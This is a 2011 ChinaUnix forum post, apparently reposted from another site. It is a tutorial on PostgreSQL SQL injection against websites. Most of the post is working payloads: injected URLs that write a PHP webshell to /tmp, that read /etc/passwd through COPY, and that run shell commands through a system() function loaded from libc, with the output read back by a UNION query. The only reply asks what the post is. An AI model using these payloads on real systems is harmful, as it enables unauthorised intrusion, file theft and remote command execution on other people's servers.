免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2407 | 回复: 1
打印 上一主题 下一主题

黑客如何用postgresql注入黑掉网站 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2011-12-20 16:20 |只看该作者 |倒序浏览
 如何获得webshell

  http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);

  http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$$$);

  http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;

  如何读文件

  http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);

  http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;

  http://127.0.0.1/postgresql.php?id=1;select * from myfile;

  执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。

  当然,这些的postgresql的数据库版本必须大于8.X。

  创建一个system的函数:

  CREATE FUNCTION system(cstring) RETURNS int AS ’/lib/libc.so.6’, ’system’ LANGUAGE ’C’ STRICT

  创建一个输出表:

  CREATE TABLE stdout(id serial, system_out text)

  执行shell,输出到输出表内:

  SELECT system(’uname -a > /tmp/test’)

  copy 输出的内容到表里面;

  COPY stdout(system_out) FROM ’/tmp/test’

  从输出表内读取执行后的回显,判断是否执行成功

  SELECT system_out FROM stdout

  下面是测试例子

  /store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- /store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS

  ’/lib/libc.so.6’,’system’ LANGUAGE ’C’STRICT --/store.php?id=1; SELECT system(’uname -a > /tmp/test’) --/store.php?id=1; COPY stdout(system_out) FROM ’/tmp/test’ --/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out

  ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--

来源:http://www.qudong.com/soft/safe/hacker/20100118/63267.html

论坛徽章:
59
2015七夕节徽章
日期:2015-08-24 11:17:25ChinaUnix专家徽章
日期:2015-07-20 09:19:30每周论坛发贴之星
日期:2015-07-20 09:19:42ChinaUnix元老
日期:2015-07-20 11:04:38荣誉版主
日期:2015-07-20 11:05:19巳蛇
日期:2015-07-20 11:05:26CU十二周年纪念徽章
日期:2015-07-20 11:05:27IT运维版块每日发帖之星
日期:2015-07-20 11:05:34操作系统版块每日发帖之星
日期:2015-07-20 11:05:36程序设计版块每日发帖之星
日期:2015-07-20 11:05:40数据库技术版块每日发帖之星
日期:2015-07-20 11:05:432015年辞旧岁徽章
日期:2015-07-20 11:05:44
2 [报告]
发表于 2011-12-21 20:44 |只看该作者
这个是什么东西?
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP